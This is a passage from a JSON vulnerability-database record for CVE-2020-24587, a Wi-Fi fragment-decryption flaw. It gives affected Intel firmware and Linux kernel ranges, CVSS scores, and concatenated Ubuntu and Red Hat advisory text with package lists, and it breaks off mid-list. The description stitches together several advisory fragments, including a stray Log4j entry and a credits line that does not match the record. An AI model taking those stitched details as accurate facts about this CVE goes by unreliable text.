            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:proset_wireless_7265_\\(rev_d\\)_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:proset_wireless_7265_\\(rev_d\\):-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:wi-fi_6_ax200_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:wi-fi_6_ax200:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:wi-fi_6_ax201_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:wi-fi_6_ax201:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.4.271",
                "versionStartIncluding": "4.4",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.9.271",
                "versionStartIncluding": "4.9",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.14.235",
                "versionStartIncluding": "4.14",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.19.193",
                "versionStartIncluding": "4.19",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.4.124",
                "versionStartIncluding": "5.4",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.10.42",
                "versionStartIncluding": "5.10",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.12.9",
                "versionStartIncluding": "5.12",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-24587"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Mitsubishi Electric reported these vulnerabilities to CISA.",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-632"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2020-24587",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "HIGH",
            "accessVector": "ADJACENT_NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 1.8,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.2,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "LOW",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:A/AC:H/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "High",
            "accessVector": "Adjacent Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 1.8,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2020-24587",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Low",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:A/AC:H/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "ADJACENT_NETWORK",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 2.6,
            "baseSeverity": "LOW",
            "confidentialityImpact": "LOW",
            "exploitabilityScore": 1.2,
            "impactScore": 1.4,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Adjacent Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 2.6,
            "baseSeverity": "Low",
            "confidentialityImpact": "Low",
            "exploitabilityScore": null,
            "id": "CVE-2020-24587",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:A/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2020-24587",
            "trust": 1.8,
            "value": "LOW"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202105-632",
            "trust": 0.6,
            "value": "LOW"
          },
          {
            "author": "VULMON",
            "id": "CVE-2020-24587",
            "trust": 0.1,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2020-24587"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-006876"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-632"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-24587"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The 802.11 standard that underpins Wi-Fi Protected Access (WPA, WPA2, and WPA3) and Wired Equivalent Privacy (WEP) doesn\u0027t require that all fragments of a frame are encrypted under the same key. An adversary can abuse this to decrypt selected fragments when another device sends fragmented frames and the WEP, CCMP, or GCMP encryption key is periodically renewed. IEEE 802.11 The standard has vulnerabilities regarding cryptographic strength.Information may be obtained. A flaw was found in the Linux kernel\u0027s WiFi implementation. An attacker within the wireless range can abuse a logic flaw in the WiFi implementation by reassembling packets from multiple fragments under different keys, treating them as valid. This flaw allows an malicious user to send a fragment under an incorrect key, treating them as a valid fragment under the new key. The highest threat from this vulnerability is to confidentiality. ==========================================================================\nUbuntu Security Notice USN-4997-2\nJune 25, 2021\n\nlinux-kvm vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 21.04\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \n\nSoftware Description:\n- linux-kvm: Linux kernel for cloud environments\n\nDetails:\n\nUSN-4997-1 fixed vulnerabilities in the Linux kernel for Ubuntu 21.04. \nThis update provides the corresponding updates for the Linux KVM\nkernel for Ubuntu 21.04. \n\nNorbert Slusarek discovered a race condition in the CAN BCM networking\nprotocol of the Linux kernel leading to multiple use-after-free\nvulnerabilities. A local attacker could use this issue to execute arbitrary\ncode. (CVE-2021-3609)\n\nPiotr Krysiuk discovered that the eBPF implementation in the Linux kernel\ndid not properly enforce limits for pointer operations. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2021-33200)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation did\nnot properly clear received fragments from memory in some situations. A\nphysically proximate attacker could possibly use this issue to inject\npackets or expose sensitive information. (CVE-2020-24586)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation\nincorrectly handled encrypted fragments. A physically proximate attacker\ncould possibly use this issue to decrypt fragments. (CVE-2020-24587)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation\nincorrectly handled certain malformed frames. If a user were tricked into\nconnecting to a malicious server, a physically proximate attacker could use\nthis issue to inject packets. (CVE-2020-24588)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation\nincorrectly handled EAPOL frames from unauthenticated senders. A physically\nproximate attacker could inject malicious packets to cause a denial of\nservice (system crash). (CVE-2020-26139)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation did\nnot properly verify certain fragmented frames. A physically proximate\nattacker could possibly use this issue to inject or decrypt packets. \n(CVE-2020-26141)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation\naccepted plaintext fragments in certain situations. A physically proximate\nattacker could use this issue to inject packets. (CVE-2020-26145)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation could\nreassemble mixed encrypted and plaintext fragments. A physically proximate\nattacker could possibly use this issue to inject packets or exfiltrate\nselected fragments. (CVE-2020-26147)\n\nOr Cohen discovered that the SCTP implementation in the Linux kernel\ncontained a race condition in some situations, leading to a use-after-free\ncondition. A local attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2021-23133)\n\nOr Cohen and Nadav Markus discovered a use-after-free vulnerability in the\nnfc implementation in the Linux kernel. A privileged local attacker could\nuse this issue to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2021-23134)\n\nManfred Paul discovered that the extended Berkeley Packet Filter (eBPF)\nimplementation in the Linux kernel contained an out-of-bounds\nvulnerability. A local attacker could use this issue to execute arbitrary\ncode. (CVE-2021-31440)\n\nPiotr Krysiuk discovered that the eBPF implementation in the Linux kernel\ndid not properly prevent speculative loads in certain situations. A local\nattacker could use this to expose sensitive information (kernel memory). \n(CVE-2021-31829)\n\nIt was discovered that a race condition in the kernel Bluetooth subsystem\ncould lead to use-after-free of slab objects. An attacker could use this\nissue to possibly execute arbitrary code. (CVE-2021-32399)\n\nIt was discovered that a use-after-free existed in the Bluetooth HCI driver\nof the Linux kernel. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code. (CVE-2021-33034)\n\nIt was discovered that an out-of-bounds (OOB) memory access flaw existed in\nthe f2fs module of the Linux kernel. A local attacker could use this issue\nto cause a denial of service (system crash). (CVE-2021-3506)\n\nMathias Krause discovered that a null pointer dereference existed in the\nNitro Enclaves kernel driver of the Linux kernel. A local attacker could\nuse this issue to cause a denial of service or possibly execute arbitrary\ncode. (CVE-2021-3543)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 21.04:\n  linux-image-5.11.0-1009-kvm     5.11.0-1009.9\n  linux-image-kvm                 5.11.0.1009.9\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n  https://ubuntu.com/security/notices/USN-4997-2\n  https://ubuntu.com/security/notices/USN-4997-1\n  CVE-2020-24586, CVE-2020-24587, CVE-2020-24588, CVE-2020-26139,\n  CVE-2020-26141, CVE-2020-26145, CVE-2020-26147, CVE-2021-23133,\n  CVE-2021-23134, CVE-2021-31440, CVE-2021-31829, CVE-2021-32399,\n  CVE-2021-33034, CVE-2021-33200, CVE-2021-3506, CVE-2021-3543,\n  CVE-2021-3609\n\nPackage Information:\n  https://launchpad.net/ubuntu/+source/linux-kvm/5.11.0-1009.9\n\n. 8) - x86_64\n\n3. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. \n\nSecurity Fix(es):\n* kernel: out-of-bounds reads in pinctrl subsystem. Bugs fixed (https://bugzilla.redhat.com/):\n\n2030932 - CVE-2021-44228 log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value\n\n5. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n====================================================================                   \nRed Hat Security Advisory\n\nSynopsis:          Moderate: kernel security, bug fix, and enhancement update\nAdvisory ID:       RHSA-2021:4356-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2021:4356\nIssue date:        2021-11-09\nCVE Names:         CVE-2020-0427 CVE-2020-24502 CVE-2020-24503\n                   CVE-2020-24504 CVE-2020-24586 CVE-2020-24587\n                   CVE-2020-24588 CVE-2020-26139 CVE-2020-26140\n                   CVE-2020-26141 CVE-2020-26143 CVE-2020-26144\n                   CVE-2020-26145 CVE-2020-26146 CVE-2020-26147\n                   CVE-2020-27777 CVE-2020-29368 CVE-2020-29660\n                   CVE-2020-36158 CVE-2020-36386 CVE-2021-0129\n                   CVE-2021-3348 CVE-2021-3489 CVE-2021-3564\n                   CVE-2021-3573 CVE-2021-3600 CVE-2021-3635\n                   CVE-2021-3659 CVE-2021-3679 CVE-2021-3732\n                   CVE-2021-20194 CVE-2021-20239 CVE-2021-23133\n                   CVE-2021-28950 CVE-2021-28971 CVE-2021-29155\n                   CVE-2021-29646 CVE-2021-29650 CVE-2021-31440\n                   CVE-2021-31829 CVE-2021-31916 CVE-2021-33200\n====================================================================\n1. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux BaseOS (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux CRB (v. 8) - aarch64, ppc64le, x86_64\n\n3. \n\nSecurity Fix(es):\n* kernel: out-of-bounds reads in pinctrl subsystem (CVE-2020-0427)\n* kernel: Improper input validation in some Intel(R) Ethernet E810 Adapter\ndrivers (CVE-2020-24502)\n* kernel: Insufficient access control in some Intel(R) Ethernet E810\nAdapter drivers (CVE-2020-24503)\n* kernel: Uncontrolled resource consumption in some Intel(R) Ethernet E810\nAdapter drivers (CVE-2020-24504)\n* kernel: Fragmentation cache not cleared on reconnection (CVE-2020-24586)\n* kernel: Reassembling fragments encrypted under different keys\n(CVE-2020-24587)\n* kernel: wifi frame payload being parsed incorrectly as an L2 frame\n(CVE-2020-24588)\n* kernel: Forwarding EAPOL from unauthenticated wifi client\n(CVE-2020-26139)\n* kernel: accepting plaintext data frames in protected networks\n(CVE-2020-26140)\n* kernel: not verifying TKIP MIC of fragmented frames (CVE-2020-26141)\n* kernel: accepting fragmented plaintext frames in protected networks\n(CVE-2020-26143)\n* kernel: accepting unencrypted A-MSDU frames that start with RFC1042\nheader (CVE-2020-26144)\n* kernel: accepting plaintext broadcast fragments as full frames\n(CVE-2020-26145)\n* kernel: powerpc: RTAS calls can be used to compromise kernel integrity\n(CVE-2020-27777)\n* kernel: locking inconsistency in tty_io.c and tty_jobctrl.c can lead to a\nread-after-free (CVE-2020-29660)\n* kernel: buffer overflow in mwifiex_cmd_802_11_ad_hoc_start function via a\nlong SSID value (CVE-2020-36158)\n* kernel: slab out-of-bounds read in hci_extended_inquiry_result_evt()\n(CVE-2020-36386)\n* kernel: Improper access control in BlueZ may allow information disclosure\nvulnerability. (CVE-2021-0129)\n* kernel: Use-after-free in ndb_queue_rq() in drivers/block/nbd.c\n(CVE-2021-3348)\n* kernel: Linux kernel eBPF RINGBUF map oversized allocation\n(CVE-2021-3489)\n* kernel: double free in bluetooth subsystem when the HCI device\ninitialization fails (CVE-2021-3564)\n* kernel: use-after-free in function hci_sock_bound_ioctl() (CVE-2021-3573)\n* kernel: eBPF 32-bit source register truncation on div/mod (CVE-2021-3600)\n* kernel: DoS in rb_per_cpu_empty() (CVE-2021-3679)\n* kernel: Mounting overlayfs inside an unprivileged user namespace can\nreveal files (CVE-2021-3732)\n* kernel: heap overflow in __cgroup_bpf_run_filter_getsockopt()\n(CVE-2021-20194)\n* kernel: Race condition in sctp_destroy_sock list_del (CVE-2021-23133)\n* kernel: fuse: stall on CPU can occur because a retry loop continually\nfinds the same bad inode (CVE-2021-28950)\n* kernel: System crash in intel_pmu_drain_pebs_nhm in\narch/x86/events/intel/ds.c (CVE-2021-28971)\n* kernel: protection can be bypassed to leak content of kernel memory\n(CVE-2021-29155)\n* kernel: improper input validation in tipc_nl_retrieve_key function in\nnet/tipc/node.c (CVE-2021-29646)\n* kernel: lack a full memory barrier may lead to DoS (CVE-2021-29650)\n* kernel: local escalation of privileges in handling of eBPF programs\n(CVE-2021-31440)\n* kernel: protection of stack pointer against speculative pointer\narithmetic can be bypassed to leak content of kernel memory\n(CVE-2021-31829)\n* kernel: out-of-bounds reads and writes due to enforcing incorrect limits\nfor pointer arithmetic operations by BPF verifier (CVE-2021-33200)\n* kernel: reassembling encrypted fragments with non-consecutive packet\nnumbers (CVE-2020-26146)\n* kernel: reassembling mixed encrypted/plaintext fragments (CVE-2020-26147)\n* kernel: the copy-on-write implementation can grant unintended write\naccess because of a race condition in a THP mapcount check (CVE-2020-29368)\n* kernel: flowtable list del corruption with kernel BUG at\nlib/list_debug.c:50 (CVE-2021-3635)\n* kernel: NULL pointer dereference in llsec_key_alloc() in\nnet/mac802154/llsec.c (CVE-2021-3659)\n* kernel: setsockopt System Call Untrusted Pointer Dereference Information\nDisclosure (CVE-2021-20239)\n* kernel: out of bounds array access in drivers/md/dm-ioctl.c\n(CVE-2021-31916)\n\n4. Solution:\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 8.5 Release Notes linked from the References section. \n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1509204 - dlm: Add ability to set SO_MARK on DLM sockets\n1793880 - Unreliable RTC synchronization (11-minute mode)\n1816493 - [RHEL 8.3] Discard request from mkfs.xfs takes too much time on raid10\n1900844 - CVE-2020-27777 kernel: powerpc: RTAS calls can be used to compromise kernel integrity\n1903244 - CVE-2020-29368 kernel: the copy-on-write implementation can grant unintended write access because of a race condition in a THP mapcount check\n1906522 - CVE-2020-29660 kernel: locking inconsistency in drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c can lead to a read-after-free\n1912683 - CVE-2021-20194 kernel: heap overflow in __cgroup_bpf_run_filter_getsockopt()\n1913348 - CVE-2020-36158 kernel: buffer overflow in mwifiex_cmd_802_11_ad_hoc_start function in drivers/net/wireless/marvell/mwifiex/join.c via a long SSID value\n1915825 - Allow falling back to genfscon labeling when the FS doesn\u0027t support xattrs and there is a fs_use_xattr rule for it\n1919893 - CVE-2020-0427 kernel: out-of-bounds reads in pinctrl subsystem. \n1921958 - CVE-2021-3348 kernel: Use-after-free in ndb_queue_rq() in drivers/block/nbd.c\n1923636 - CVE-2021-20239 kernel: setsockopt System Call Untrusted Pointer Dereference Information Disclosure\n1930376 - CVE-2020-24504 kernel: Uncontrolled resource consumption in some Intel(R) Ethernet E810 Adapter drivers\n1930379 - CVE-2020-24502 kernel: Improper input validation in some Intel(R) Ethernet E810 Adapter drivers\n1930381 - CVE-2020-24503 kernel: Insufficient access control in some Intel(R) Ethernet E810 Adapter drivers\n1933527 - Files on cifs mount can get mixed contents when underlying file is removed but inode number is reused, when mounted with \u0027serverino\u0027 and \u0027cache=strict \u0027\n1939341 - CNB: net: add inline function skb_csum_is_sctp\n1941762 - CVE-2021-28950 kernel: fuse: stall on CPU can occur because a retry loop continually finds the same bad inode\n1941784 - CVE-2021-28971 kernel: System crash in intel_pmu_drain_pebs_nhm in arch/x86/events/intel/ds.c\n1945345 - CVE-2021-29646 kernel: improper input validation in tipc_nl_retrieve_key function in net/tipc/node.c\n1945388 - CVE-2021-29650 kernel: lack a full memory barrier upon the assignment of a new table value in net/netfilter/x_tables.c and include/linux/netfilter/x_tables.h may lead to DoS\n1946965 - CVE-2021-31916 kernel: out of bounds array access in drivers/md/dm-ioctl.c\n1948772 - CVE-2021-23133 kernel: Race condition in sctp_destroy_sock list_del\n1951595 - CVE-2021-29155 kernel: protection for sequences of pointer arithmetic operations against speculatively out-of-bounds loads can be bypassed to leak content of kernel memory\n1953847 - [ethtool] The `NLM_F_MULTI` should be used for `NLM_F_DUMP`\n1954588 - RHEL kernel 8.2 and higher are affected by data corruption bug in raid1 arrays using bitmaps. \n1957788 - CVE-2021-31829 kernel: protection of stack pointer against speculative pointer arithmetic can be bypassed to leak content of kernel memory\n1959559 - CVE-2021-3489 kernel: Linux kernel eBPF RINGBUF map oversized allocation\n1959642 - CVE-2020-24586 kernel: Fragmentation cache not cleared on reconnection\n1959654 - CVE-2020-24587 kernel: Reassembling fragments encrypted under different keys\n1959657 - CVE-2020-24588 kernel: wifi frame payload being parsed incorrectly as an L2 frame\n1959663 - CVE-2020-26139 kernel: Forwarding EAPOL from unauthenticated wifi client\n1960490 - CVE-2020-26140 kernel: accepting plaintext data frames in protected networks\n1960492 - CVE-2020-26141 kernel: not verifying TKIP MIC of fragmented frames\n1960496 - CVE-2020-26143 kernel: accepting fragmented plaintext frames in protected networks\n1960498 - CVE-2020-26144 kernel: accepting unencrypted A-MSDU frames that start with RFC1042 header\n1960500 - CVE-2020-26145 kernel: accepting plaintext broadcast fragments as full frames\n1960502 - CVE-2020-26146 kernel: reassembling encrypted fragments with non-consecutive packet numbers\n1960504 - CVE-2020-26147 kernel: reassembling mixed encrypted/plaintext fragments\n1960708 - please add CAP_CHECKPOINT_RESTORE to capability.h\n1964028 - CVE-2021-31440 kernel: local escalation of privileges in handling of eBPF programs\n1964139 - CVE-2021-3564 kernel: double free in bluetooth subsystem when the HCI device initialization fails\n1965038 - CVE-2021-0129 kernel: Improper access control in BlueZ may allow information disclosure vulnerability. \n1965360 - kernel: get_timespec64 does not ignore padding in compat syscalls\n1965458 - CVE-2021-33200 kernel: out-of-bounds reads and writes due to enforcing incorrect limits for pointer arithmetic operations by BPF verifier\n1966578 - CVE-2021-3573 kernel: use-after-free in function hci_sock_bound_ioctl()\n1969489 - CVE-2020-36386 kernel: slab out-of-bounds read in hci_extended_inquiry_result_evt() in net/bluetooth/hci_event.c\n1971101 - ceph: potential data corruption in cephfs write_begin codepath\n1972278 - libceph: allow addrvecs with a single NONE/blank address\n1974627 - [TIPC] kernel BUG at lib/list_debug.c:31!\n1975182 - CVE-2021-33909 kernel: size_t-to-int conversion vulnerability in the filesystem layer [rhel-8.5.0]\n1975949 - CVE-2021-3659 kernel: NULL pointer dereference in llsec_key_alloc() in net/mac802154/llsec.c\n1976679 - blk-mq: fix/improve io scheduler batching dispatch\n1976699 - [SCTP]WARNING: CPU: 29 PID: 3165 at mm/page_alloc.c:4579 __alloc_pages_slowpath+0xb74/0xd00\n1976946 - CVE-2021-3635 kernel: flowtable list del corruption with kernel BUG at lib/list_debug.c:50\n1976969 - XFS: followup to XFS sync to upstream v5.10 (re BZ1937116)\n1977162 - [XDP] test program warning: libbpf: elf: skipping unrecognized data section(16) .eh_frame\n1977422 - Missing backport of IMA boot aggregate calculation in rhel 8.4 kernel\n1977537 - RHEL8.5: Update the kernel workqueue code to v5.12 level\n1977850 - geneve virtual devices lack  the NETIF_F_FRAGLIST feature\n1978369 - dm writecache: sync with upstream 5.14\n1979070 - Inaccessible NFS server overloads clients (native_queued_spin_lock_slowpath connotation?)\n1979680 - Backport openvswitch tracepoints\n1981954 - CVE-2021-3600 kernel: eBPF 32-bit source register truncation on div/mod\n1986138 - Lockd invalid cast to nlm_lockowner\n1989165 - CVE-2021-3679 kernel: DoS in rb_per_cpu_empty()\n1989999 - ceph omnibus backport for RHEL-8.5.0\n1991976 - block: fix New warning in nvme_setup_discard\n1992700 - blk-mq: fix kernel panic when iterating over flush request\n1995249 - CVE-2021-3732 kernel: overlayfs: Mounting overlayfs inside an unprivileged user namespace can reveal files\n1996854 - dm crypt: Avoid percpu_counter spinlock contention in crypt_page_alloc()\n\n6. Package List:\n\nRed Hat Enterprise Linux BaseOS (v. 8):\n\nSource:\nkernel-4.18.0-348.el8.src.rpm\n\naarch64:\nbpftool-4.18.0-348.el8.aarch64.rpm\nbpftool-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-4.18.0-348.el8.aarch64.rpm\nkernel-core-4.18.0-348.el8.aarch64.rpm\nkernel-cross-headers-4.18.0-348.el8.aarch64.rpm\nkernel-debug-4.18.0-348.el8.aarch64.rpm\nkernel-debug-core-4.18.0-348.el8.aarch64.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-debug-devel-4.18.0-348.el8.aarch64.rpm\nkernel-debug-modules-4.18.0-348.el8.aarch64.rpm\nkernel-debug-modules-extra-4.18.0-348.el8.aarch64.rpm\nkernel-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-debuginfo-common-aarch64-4.18.0-348.el8.aarch64.rpm\nkernel-devel-4.18.0-348.el8.aarch64.rpm\nkernel-headers-4.18.0-348.el8.aarch64.rpm\nkernel-modules-4.18.0-348.el8.aarch64.rpm\nkernel-modules-extra-4.18.0-348.el8.aarch64.rpm\nkernel-tools-4.18.0-348.el8.aarch64.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-tools-libs-4.18.0-348.el8.aarch64.rpm\nperf-4.18.0-348.el8.aarch64.rpm\nperf-debuginfo-4.18.0-348.el8.aarch64.rpm\npython3-perf-4.18.0-348.el8.aarch64.rpm\npython3-perf-debuginfo-4.18.0-348.el8.aarch64.rpm\n\nnoarch:\nkernel-abi-stablelists-4.18.0-348.el8.noarch.rpm\nkernel-doc-4.18.0-348.el8.noarch.rpm\n\nppc64le:\nbpftool-4.18.0-348.el8.ppc64le.rpm\nbpftool-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-4.18.0-348.el8.ppc64le.rpm\nkernel-core-4.18.0-348.el8.ppc64le.rpm\nkernel-cross-headers-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-core-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-devel-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-modules-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-modules-extra-4.18.0-348.el8.ppc64le.rpm\nkernel-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-4.18.0-348.el8.ppc64le.rpm\nkernel-devel-4.18.0-348.el8.ppc64le.rpm\nkernel-headers-4.18.0-348.el8.ppc64le.rpm\nkernel-modules-4.18.0-348.el8.ppc64le.rpm\nkernel-modules-extra-4.18.0-348.el8.ppc64le.rpm\nkernel-tools-4.18.0-348.el8.ppc64le.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-tools-libs-4.18.0-348.el8.ppc64le.rpm\nperf-4.18.0-348.el8.ppc64le.rpm\nperf-debuginfo-4.18.0-348.el8.ppc64le.rpm\npython3-perf-4.18.0-348.el8.ppc64le.rpm\npython3-perf-debuginfo-4.18.0-348.el8.ppc64le.rpm\n\ns390x:\nbpftool-4.18.0-348.el8.s390x.rpm\nbpftool-debuginfo-4.18.0-348.el8.s390x.rpm\nkernel-4.18.0-348.el8.s390x.rpm\nkernel-core-4.18.0-348.el8.s390x.rpm\nkernel-cross-headers-4.18.0-348.el8.s390x.rpm\nkernel-debug-4.18.0-348.el8.s390x.rpm\nkernel-debug-core-4.18.0-348.el8.s390x.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.s